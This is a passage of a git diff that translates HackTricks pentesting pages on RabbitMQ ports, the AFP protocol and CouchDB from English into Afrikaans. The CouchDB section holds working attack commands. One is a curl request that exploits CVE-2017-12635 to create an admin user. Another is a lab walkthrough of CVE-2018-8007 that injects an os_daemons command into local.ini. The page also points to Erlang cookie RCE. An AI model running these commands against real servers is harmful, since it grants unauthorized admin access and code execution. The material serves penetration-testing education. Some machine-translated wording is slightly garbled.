**4369: epmd**, 'n peer-ontdekkingsdiens wat deur RabbitMQ-nodes en CLI-hulpmiddels gebruik word. [**Leer meer oor hoe om hierdie diens te pentest hier**](4369-pentesting-erlang-port-mapper-daemon-epmd.md). +* **5672, 5671**: gebruik deur AMQP 0-9-1 en 1.0-kliënte sonder en met TLS +* **15672**: [HTTP API](https://www.rabbitmq.com/management.html)-kliënte, [bestuurskoppelvlak](https://www.rabbitmq.com/management.html) en [rabbitmqadmin](https://www.rabbitmq.com/management-cli.html) (slegs as die [bestuursinvoegtoepassing](https://www.rabbitmq.com/management.html) geaktiveer is). [**Leer meer oor hoe om hierdie diens te pentest hier**](15672-pentesting-rabbitmq-management.md). +* 15674: STOMP-oor-WebSockets-kliënte (slegs as die [Web STOMP-invoegtoepassing](https://www.rabbitmq.com/web-stomp.html) geaktiveer is) +* 15675: MQTT-oor-WebSockets-kliënte (slegs as die [Web MQTT-invoegtoepassing](https://www.rabbitmq.com/web-mqtt.html) geaktiveer is) +* 15692: Prometheus-metriek (slegs as die [Prometheus-invoegtoepassing](https://www.rabbitmq.com/prometheus.html) geaktiveer is) +* 25672: gebruik vir inter-node en CLI-hulpmiddelkommunikasie (Erlang-verspreidingsbedienerpoort) en word toegewys uit 'n dinamiese reeks (beperk tot 'n enkele poort standaard, bereken as AMQP-poort + 20000). Tensy eksterne verbindinge op hierdie poorte werklik nodig is (bv. die groep maak gebruik van [federasie](https://www.rabbitmq.com/federation.html) of CLI-hulpmiddels word op masjiene buite die subnet gebruik), moet hierdie poorte nie openlik blootgestel word nie. Sien [netwerkgids](https://www.rabbitmq.com/networking.html) vir meer besonderhede. **Slegs 9 van hierdie poorte is oop op die internet**. +* 35672-35682: gebruik deur CLI-hulpmiddels (Erlang-verspreidingskliëntpoorte) vir kommunikasie met nodes en word toegewys uit 'n dinamiese reeks (bereken as bedienerverspreidingspoort + 10000 tot bedienerverspreidingspoort + 10010). Sien [netwerkgids](https://www.rabbitmq.com/networking.html) vir meer besonderhede. +* 61613, 61614: [STOMP-kliënte](https://stomp.github.io/stomp-specification-1.2.html) sonder en met TLS (slegs as die [STOMP-invoegtoepassing](https://www.rabbitmq.com/stomp.html) geaktiveer is). Minder as 10 toestelle met hierdie poort oop en meestal UDP vir DHT-nodes. ## Shodan @@ -90,14 +97,14 @@ In [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networkin
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/network-services-pentesting/584-pentesting-afp.md b/network-services-pentesting/584-pentesting-afp.md index 68f587c7e..d1896f78c 100644 --- a/network-services-pentesting/584-pentesting-afp.md +++ b/network-services-pentesting/584-pentesting-afp.md @@ -2,58 +2,54 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -The **Apple Filing Protocol** (**AFP**), once known as AppleTalk Filing Protocol, is a specialized network protocol included within the **Apple File Service** (**AFS**). It is designed to provide file services for macOS and the classic Mac OS. AFP stands out for supporting Unicode file names, POSIX and access control list permissions, resource forks, named extended attributes, and sophisticated file locking mechanisms. It was the main protocol for file services in Mac OS 9 and earlier versions. - -**Default Port:** 548 +Die **Apple Filing Protocol** (**AFP**), voorheen bekend as AppleTalk Filing Protocol, is 'n gespesialiseerde netwerkprotokol wat ingesluit is in die **Apple File Service** (**AFS**). Dit is ontwerp om lêerdienste te voorsien vir macOS en die klassieke Mac OS. AFP onderskei hom deur ondersteuning te bied vir Unicode-lêernaam, POSIX- en toegangsbeheerlys-permissies, hulpbronvurke, genoemde uitgebreide eienskappe en gesofistikeerde lêervergrendelingsmeganismes. Dit was die hoofprotokol vir lêerdienste in Mac OS 9 en vroeëre weergawes. +**Verstekpoort:** 548 ```bash PORT STATE SERVICE 548/tcp open afp ``` +### **Opsomming** -### **Enumeration** - -For the enumeration of AFP services, the following commands and scripts are useful: - +Vir die opsomming van AFP-dienste is die volgende opdragte en skripte nuttig: ```bash msf> use auxiliary/scanner/afp/afp_server_info nmap -sV --script "afp-* and not dos and not brute" -p ``` +**Skripte en hul beskrywings:** -**Scripts and Their Descriptions:** - -- **afp-ls**: This script is utilized to list the available AFP volumes and files. -- **afp-path-vuln**: It lists all AFP volumes and files, highlighting potential vulnerabilities. -- **afp-serverinfo**: This provides detailed information about the AFP server. -- **afp-showmount**: It lists available AFP shares along with their respective ACLs. +- **afp-ls**: Hierdie skrip word gebruik om die beskikbare AFP volumes en lêers te lys. +- **afp-path-vuln**: Dit lys alle AFP volumes en lêers en beklemtoon potensiële kwesbaarhede. +- **afp-serverinfo**: Dit verskaf gedetailleerde inligting oor die AFP-bediener. +- **afp-showmount**: Dit lys beskikbare AFP-aandele saam met hul onderskeie ACL's. ### [**Brute Force**](../generic-methodologies-and-resources/brute-force.md#afp)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/network-services-pentesting/5984-pentesting-couchdb.md b/network-services-pentesting/5984-pentesting-couchdb.md index 37585937b..4a6a7d216 100644 --- a/network-services-pentesting/5984-pentesting-couchdb.md +++ b/network-services-pentesting/5984-pentesting-couchdb.md @@ -2,115 +2,111 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## **Basic Information** +## **Basiese Inligting** -**CouchDB** is a versatile and powerful **document-oriented database** that organizes data using a **key-value map** structure within each **document**. Fields within the document can be represented as **key/value pairs, lists, or maps**, providing flexibility in data storage and retrieval. +**CouchDB** is 'n veelsydige en kragtige **dokumentgeoriënteerde databasis** wat data organiseer deur gebruik te maak van 'n **sleutel-waardekaart**-struktuur binne elke **dokument**. Velde binne die dokument kan voorgestel word as **sleutel/waardepare, lysies of kaarte**, wat buigsaamheid bied in data-opberging en -herwinning. -Every **document** stored in CouchDB is assigned a **unique identifier** (`_id`) at the document level. Additionally, each modification made and saved to the database is assigned a **revision number** (`_rev`). This revision number allows for efficient **tracking and management of changes**, facilitating easy retrieval and synchronization of data within the database. - -**Default port:** 5984(http), 6984(https) +Elke **dokument** wat in CouchDB gestoor word, word 'n **unieke identifiseerder** (`_id`) op dokumentvlak toegewys. Daarbenewens word elke wysiging wat in die databasis aangebring en gestoor word, 'n **revisienommer** (`_rev`) toegewys. Hierdie revisienommer maak doeltreffende **opsporing en bestuur van veranderinge** moontlik, wat die maklike herwinning en synchronisering van data binne die databasis fasiliteer. +**Verstekpoort:** 5984(http), 6984(https) ``` PORT STATE SERVICE REASON 5984/tcp open unknown syn-ack ``` - -## **Automatic Enumeration** - +## **Outomatiese Opsomming** ```bash nmap -sV --script couchdb-databases,couchdb-stats -p msf> use auxiliary/scanner/couchdb/couchdb_enum ``` +### Boodskap -## Manual Enumeration +Die banner van 'n CouchDB-diens kan verkry word deur die diens se TCP-poort te skandeer. Die banner bevat inligting soos die weergawe van die diens en die naam van die databasis. Hier is 'n voorbeeld van 'n CouchDB-banner: -### Banner +``` +HTTP/1.1 200 OK +Server: CouchDB/2.3.1 (Erlang OTP/21) +Date: Mon, 01 Jan 2022 00:00:00 GMT +Content-Type: application/json +Content-Length: 87 +Cache-Control: must-revalidate +{"couchdb":"Welcome","version":"2.3.1","vendor":{"name":"The Apache Software Foundation"}} +``` + +Die banner kan nuttige inligting verskaf vir verdere ondersoek en aanvalle op die CouchDB-diens. ``` curl http://IP:5984/ ``` - -This issues a GET request to installed CouchDB instance. The reply should look something like on of the following: - +Hierdie stuur 'n GET-versoek na die geïnstalleerde CouchDB-instantie. Die antwoord moet lyk soos een van die volgende: ```bash {"couchdb":"Welcome","version":"0.10.1"} {"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}} ``` - {% hint style="info" %} -Note that if accessing the root of couchdb you receive a `401 Unauthorized` with something like this: `{"error":"unauthorized","reason":"Authentication required."}` **you won't be able to access** the banner or any other endpoint. +Let daarop dat as jy toegang tot die wortel van couchdb kry, ontvang jy 'n `401 Unauthorized` met iets soos dit: `{"error":"unauthorized","reason":"Authentication required."}` **jy sal nie in staat wees om** die banier of enige ander eindpunt te bereik nie. {% endhint %} -### Info Enumeration +### Info Enumerasie -These are the endpoints where you can access with a **GET** request and extract some interesting info. You can find [**more endpoints and more detailed descriptions in the couchdb documentation**](https://docs.couchdb.org/en/latest/api/index.html). +Dit is die eindpunte waar jy toegang kan verkry met 'n **GET** versoek en interessante inligting kan onttrek. Jy kan [**meer eindpunte en meer gedetailleerde beskrywings in die couchdb dokumentasie vind**](https://docs.couchdb.org/en/latest/api/index.html). -* **`/_active_tasks`** List of running tasks, including the task type, name, status and process ID. -* **`/_all_dbs`** Returns a list of all the databases in the CouchDB instance. -* **`/_cluster_setup`**Returns the status of the node or cluster, per the cluster setup wizard. -* **`/_db_updates`** Returns a list of all database events in the CouchDB instance. The existence of the `_global_changes` database is required to use this endpoint. -* **`/_membership`** Displays the nodes that are part of the cluster as `cluster_nodes`. The field `all_nodes` displays all nodes this node knows about, including the ones that are part of the cluster. -* **`/_scheduler/jobs`** List of replication jobs. Each job description will include source and target information, replication id, a history of recent event, and a few other things. -* **`/_scheduler/docs`** List of replication document states. Includes information about all the documents, even in `completed` and `failed` states. For each document it returns the document ID, the database, the replication ID, source and target, and other information. +* **`/_active_tasks`** Lys van lopende take, insluitend die taak tipe, naam, status en proses ID. +* **`/_all_dbs`** Gee 'n lys van al die databasisse in die CouchDB instansie. +* **`/_cluster_setup`** Gee die status van die node of kluster, volgens die kluster opset wizard. +* **`/_db_updates`** Gee 'n lys van alle databasis gebeure in die CouchDB instansie. Die bestaan van die `_global_changes` databasis is nodig om hierdie eindpunt te gebruik. +* **`/_membership`** Vertoon die nodes wat deel is van die kluster as `cluster_nodes`. Die veld `all_nodes` vertoon alle nodes wat hierdie node van weet, insluitend diegene wat deel is van die kluster. +* **`/_scheduler/jobs`** Lys van replikasie take. Elke taak beskrywing sal bron en teiken inligting, replikasie ID, 'n geskiedenis van onlangse gebeure, en 'n paar ander dinge insluit. +* **`/_scheduler/docs`** Lys van replikasie dokument state. Sluit inligting in oor alle dokumente, selfs in `voltooide` en `mislukte` toestande. Vir elke dokument gee dit die dokument ID, die databasis, die replikasie ID, bron en teiken, en ander inligting. * **`/_scheduler/docs/{replicator_db}`** * **`/_scheduler/docs/{replicator_db}/{docid}`** -* **`/_node/{node-name}`** The `/_node/{node-name}` endpoint can be used to confirm the Erlang node name of the server that processes the request. This is most useful when accessing `/_node/_local` to retrieve this information. -* **`/_node/{node-name}/_stats`** The `_stats` resource returns a JSON object containing the statistics for the running server. The literal string `_local` serves as an alias for the local node name, so for all stats URLs, `{node-name}` may be replaced with `_local`, to interact with the local node’s statistics. -* **`/_node/{node-name}/_system`** The \_systemresource returns a JSON object containing various system-level statistics for the running server\_.\_ You can use \_\_`_local` as {node-name} to get current node info. +* **`/_node/{node-name}`** Die `/_node/{node-name}` eindpunt kan gebruik word om die Erlang node naam van die bediener wat die versoek verwerk, te bevestig. Dit is die nuttigste wanneer jy toegang tot `/_node/_local` verkry om hierdie inligting te herwin. +* **`/_node/{node-name}/_stats`** Die `_stats` hulpbron gee 'n JSON voorwerp wat die statistieke vir die lopende bediener bevat. Die letterlike string `_local` dien as 'n skuilnaam vir die plaaslike node naam, so vir alle statistieke URL's kan `{node-name}` vervang word met `_local`, om met die plaaslike node se statistieke te kommunikeer. +* **`/_node/{node-name}/_system`** Die \_system hulpbron gee 'n JSON voorwerp wat verskeie stelselvlak statistieke vir die lopende bediener bevat\_.\_ Jy kan \_\_`_local` as {node-name} gebruik om die huidige node inligting te kry. * **`/_node/{node-name}/_restart`** -* **`/_up`** Confirms that the server is up, running, and ready to respond to requests. If [`maintenance_mode`](https://docs.couchdb.org/en/latest/config/couchdb.html#couchdb/maintenance\_mode) is `true` or `nolb`, the endpoint will return a 404 response. -* **`/_uuids`**Requests one or more Universally Unique Identifiers (UUIDs) from the CouchDB instance. -* **`/_reshard`**Returns a count of completed, failed, running, stopped, and total jobs along with the state of resharding on the cluster. +* **`/_up`** Bevestig dat die bediener op, besig is, en gereed is om op versoek te reageer. As [`maintenance_mode`](https://docs.couchdb.org/en/latest/config/couchdb.html#couchdb/maintenance\_mode) `true` of `nolb` is, sal die eindpunt 'n 404 respons gee. +* **`/_uuids`** Versoek een of meer Universally Unique Identifiers (UUID's) van die CouchDB instansie. +* **`/_reshard`** Gee 'n telling van voltooide, mislukte, lopende, gestop, en totale take, tesame met die toestand van resharding op die kluster. -More interesting information can be extracted as explained here: [https://lzone.de/cheat-sheet/CouchDB](https://lzone.de/cheat-sheet/CouchDB) - -### **Database List** +Meer interessante inligting kan soos hier verduidelik onttrek word: [https://lzone.de/cheat-sheet/CouchDB](https://lzone.de/cheat-sheet/CouchDB) +### **Databasis Lys** ``` curl -X GET http://IP:5984/_all_dbs ``` - -If that request **responds with a 401 unauthorised**, then you need some **valid credentials** to access the database: - +As daardie versoek **reageer met 'n 401 ongemagtig**, dan het jy **geldige geloofsbriewe** nodig om toegang tot die databasis te verkry: ``` curl -X GET http://user:password@IP:5984/_all_dbs ``` +Om geldige Geldeenhede te vind, kan jy probeer om die diens te **bruteforce** (kragtig aanval) [**bruteforce die diens**](../generic-methodologies-and-resources/brute-force.md#couchdb). -In order to find valid Credentials you could **try to** [**bruteforce the service**](../generic-methodologies-and-resources/brute-force.md#couchdb). - -This is an **example** of a couchdb **response** when you have **enough privileges** to list databases (It's just a list of dbs): - +Hierdie is 'n **voorbeeld** van 'n couchdb **reaksie** wanneer jy genoeg voorregte het om databasisse te lys (Dit is net 'n lys van databasisse): ```bash ["_global_changes","_metadata","_replicator","_users","passwords","simpsons"] ``` +### Databasisinligting -### Database Info - -You can obtain some database info (like number of files and sizes) accessing the database name: - +Jy kan sekere databasisinligting verkry (soos die aantal lêers en groottes) deur toegang tot die databasisnaam: ```bash curl http://IP:5984/ curl http://localhost:5984/simpsons #Example response: {"db_name":"simpsons","update_seq":"7-g1AAAAFTeJzLYWBg4MhgTmEQTM4vTc5ISXLIyU9OzMnILy7JAUoxJTIkyf___z8rkQmPoiQFIJlkD1bHjE-dA0hdPFgdAz51CSB19WB1jHjU5bEASYYGIAVUOp8YtQsgavfjtx-i9gBE7X1i1D6AqAX5KwsA2vVvNQ","sizes":{"file":62767,"external":1320,"active":2466},"purge_seq":0,"other":{"data_size":1320},"doc_del_count":0,"doc_count":7,"disk_size":62767,"disk_format_version":6,"data_size":2466,"compact_running":false,"instance_start_time":"0"} ``` +### **Dokumentelys** -### **Document List** - -List each entry inside a database - +Lys elke inskrywing binne 'n databasis. ```bash curl -X GET http://IP:5984/{dbname}/_all_docs curl http://localhost:5984/simpsons/_all_docs @@ -125,55 +121,47 @@ curl http://localhost:5984/simpsons/_all_docs {"id":"f53679a526a868d44172c83a6100451b","key":"f53679a526a868d44172c83a6100451b","value":{"rev":"1-3f6141f3aba11da1d65ff0c13fe6fd39"}} ]} ``` +### **Lees Dokument** -### **Read Document** - -Read the content of a document inside a database: - +Lees die inhoud van 'n dokument binne 'n databasis: ```bash curl -X GET http://IP:5984/{dbname}/{id} curl http://localhost:5984/simpsons/f0042ac3dc4951b51f056467a1000dd9 #Example response: {"_id":"f0042ac3dc4951b51f056467a1000dd9","_rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329","character":"Homer","quote":"Doh!"} ``` +## CouchDB Voorregverhoging [CVE-2017-12635](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-12635) -## CouchDB Privilege Escalation [CVE-2017-12635](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-12635) - -Thanks to the differences between Erlang and JavaScript JSON parsers you could **create an admin user** with credentials `hacktricks:hacktricks` with the following request: - +Dankie aan die verskille tussen Erlang en JavaScript JSON-parser kan jy **'n administrateurgebruiker skep** met die volgende verifikasie: ```bash curl -X PUT -d '{"type":"user","name":"hacktricks","roles":["_admin"],"roles":[],"password":"hacktricks"}' localhost:5984/_users/org.couchdb.user:hacktricks -H "Content-Type:application/json" ``` - -[**More information about this vuln here**](https://justi.cz/security/2017/11/14/couchdb-rce-npm.html). +[**Meer inligting oor hierdie kwesbaarheid hier**](https://justi.cz/security/2017/11/14/couchdb-rce-npm.html). ## CouchDB RCE -### **Erlang Cookie Security Overview** +### **Erlang Koekie Sekuriteits Oorsig** -Example [from here](https://0xdf.gitlab.io/2018/09/15/htb-canape.html). +Voorbeeld [van hier](https://0xdf.gitlab.io/2018/09/15/htb-canape.html). -In the CouchDB documentation, specifically in the section concerning cluster set-up ([link](http://docs.couchdb.org/en/stable/cluster/setup.html#cluster-setup)), the use of ports by CouchDB in a cluster mode is discussed. It's mentioned that, as in standalone mode, port `5984` is used. Additionally, port `5986` is for node-local APIs, and importantly, Erlang requires TCP port `4369` for the Erlang Port Mapper Daemon (EPMD), facilitating node communication within an Erlang cluster. This setup forms a network where each node is interlinked with every other node. - -A crucial security advisory is highlighted regarding port `4369`. If this port is made accessible over the Internet or any untrusted network, the system's security heavily relies on a unique identifier known as the "cookie." This cookie acts as a safeguard. For instance, in a given process list, the cookie named "monster" might be observed, indicating its operational role in the system's security framework. +In die CouchDB dokumentasie, spesifiek in die gedeelte wat handel oor die opstel van 'n klasternetwerk ([skakel](http://docs.couchdb.org/en/stable/cluster/setup.html#cluster-setup)), word die gebruik van poorte deur CouchDB in 'n klasterverbinding bespreek. Daar word genoem dat, soos in enkelvoudige modus, poort `5984` gebruik word. Daarbenewens is poort `5986` vir node-plaaslike API's, en belangrik, Erlang vereis TCP-poort `4369` vir die Erlang Port Mapper Daemon (EPMD), wat node kommunikasie in 'n Erlang-klasternetwerk fasiliteer. Hierdie opstelling vorm 'n netwerk waar elke node met elke ander node gekoppel is. +'n Belangrike sekuriteitsadvies word uitgelig met betrekking tot poort `4369`. As hierdie poort oopgestel word vir die internet of enige onbetroubare netwerk, is die stelsel se sekuriteit sterk afhanklik van 'n unieke identifiseerder wat bekend staan as die "koekie." Hierdie koekie tree op as 'n beskerming. Byvoorbeeld, in 'n gegewe proseslys kan die koekie genaamd "monster" waargeneem word, wat dui op sy operasionele rol in die stelsel se sekuriteitsraamwerk. ``` www-data@canape:/$ ps aux | grep couchdb root 744 0.0 0.0 4240 640 ? Ss Sep13 0:00 runsv couchdb root 811 0.0 0.0 4384 800 ? S Sep13 0:00 svlogd -tt /var/log/couchdb homer 815 0.4 3.4 649348 34524 ? Sl Sep13 5:33 /home/homer/bin/../erts-7.3/bin/beam -K true -A 16 -Bd -- -root /home/homer/b ``` +Vir diegene wat belangstel om te verstaan hoe hierdie "koekie" uitgebuit kan word vir Remote Code Execution (RCE) binne die konteks van Erlang-stelsels, is daar 'n toegewyde afdeling beskikbaar vir verdere leeswerk. Dit beskryf die metodologieë vir die benutting van Erlang-koekies op ongemagtigde wyse om beheer oor stelsels te verkry. Jy kan **[die gedetailleerde gids oor die misbruik van Erlang-koekies vir RCE hier verken](4369-pentesting-erlang-port-mapper-daemon-epmd.md#erlang-cookie-rce)**. -For those interested in understanding how this "cookie" can be exploited for Remote Code Execution (RCE) within the context of Erlang systems, a dedicated section is available for further reading. It details the methodologies for leveraging Erlang cookies in unauthorized manners to achieve control over systems. You can **[explore the detailed guide on abusing Erlang cookies for RCE here](4369-pentesting-erlang-port-mapper-daemon-epmd.md#erlang-cookie-rce)**. +### **Uitbuiting van CVE-2018-8007 deur wysiging van local.ini** -### **Exploiting CVE-2018-8007 through Modification of local.ini** +Voorbeeld [van hier](https://0xdf.gitlab.io/2018/09/15/htb-canape.html). -Example [from here](https://0xdf.gitlab.io/2018/09/15/htb-canape.html). - -A recently disclosed vulnerability, CVE-2018-8007, affecting Apache CouchDB was explored, revealing that exploitation requires write permissions to the `local.ini` file. Although not directly applicable to the initial target system due to security restrictions, modifications were made to grant write access to the `local.ini` file for exploration purposes. Detailed steps and code examples are provided below, demonstrating the process. - -First, the environment is prepared by ensuring the `local.ini` file is writable, verified by listing the permissions: +'n Onlangs bekendgemaakte kwesbaarheid, CVE-2018-8007, wat Apache CouchDB affekteer, is ondersoek en daar is bevind dat uitbuiting skryftoestemmings vir die `local.ini`-lêer vereis. Alhoewel dit nie direk van toepassing is op die aanvanklike teikensisteem as gevolg van sekuriteitsbeperkings nie, is wysigings aangebring om skryftoegang tot die `local.ini`-lêer te verleen vir verkenningsdoeleindes. Gedetailleerde stappe en kodevoorbeelde word hieronder verskaf om die proses te demonstreer. +Eerstens word die omgewing voorberei deur te verseker dat die `local.ini`-lêer skryfbaar is, geverifieer deur die toestemmings te lys: ```bash root@canape:/home/homer/etc# ls -l -r--r--r-- 1 homer homer 18477 Jan 20 2018 default.ini @@ -181,15 +169,11 @@ root@canape:/home/homer/etc# ls -l -r--r--r-- 1 root root 4841 Sep 14 14:30 local.ini.bk -r--r--r-- 1 homer homer 1345 Jan 14 2018 vm.args ``` - -To exploit the vulnerability, a curl command is executed, targeting the `cors/origins` configuration in `local.ini`. This injects a new origin along with additional commands under the `[os_daemons]` section, aiming to execute arbitrary code: - +Om die kwesbaarheid uit te buit, word 'n curl-opdrag uitgevoer wat die `cors/origins`-konfigurasie in `local.ini` teiken. Dit voeg 'n nuwe oorsprong by, tesame met addisionele opdragte onder die `[os_daemons]`-afdeling, met die doel om willekeurige kode uit te voer: ```bash www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/cors/origins' -H "Accept: application/json" -H "Content-Type: application/json" -d "0xdf\n\n[os_daemons]\ntestdaemon = /usr/bin/touch /tmp/0xdf" ``` - -Subsequent verification shows the injected configuration in `local.ini`, contrasting it with a backup to highlight the changes: - +Daaropvolgende verifikasie wys die geïnjecteerde konfigurasie in `local.ini`, deur dit te vergelyk met 'n rugsteun om die veranderinge te beklemtoon: ```bash root@canape:/home/homer/etc# diff local.ini local.ini.bk 119,124d118 @@ -198,94 +182,77 @@ root@canape:/home/homer/etc# diff local.ini local.ini.bk < [os_daemons] < test_daemon = /usr/bin/touch /tmp/0xdf ``` - -Initially, the expected file (`/tmp/0xdf`) does not exist, indicating that the injected command has not been executed yet. Further investigation reveals that processes related to CouchDB are running, including one that could potentially execute the injected command: - +Aanvanklik bestaan die verwagte lêer (`/tmp/0xdf`) nie, wat aandui dat die ingeslote bevel nog nie uitgevoer is nie. Verdere ondersoek toon dat prosesse wat verband hou met CouchDB uitgevoer word, insluitend een wat moontlik die ingeslote bevel kan uitvoer: ```bash root@canape:/home/homer/bin# ps aux | grep couch ``` - -By terminating the identified CouchDB process and allowing the system to automatically restart it, the execution of the injected command is triggered, confirmed by the existence of the previously missing file: - +deur die geïdentifiseerde CouchDB-proses te beëindig en die stelsel toe te laat om dit outomaties te herlaai, word die uitvoering van die ingeslote bevel geaktiveer, bevestig deur die bestaan van die vorige ontbrekende lêer: ```bash root@canape:/home/homer/etc# kill 711 root@canape:/home/homer/etc# ls /tmp/0xdf /tmp/0xdf ``` +Hierdie verkenning bevestig die lewensvatbaarheid van CVE-2018-8007 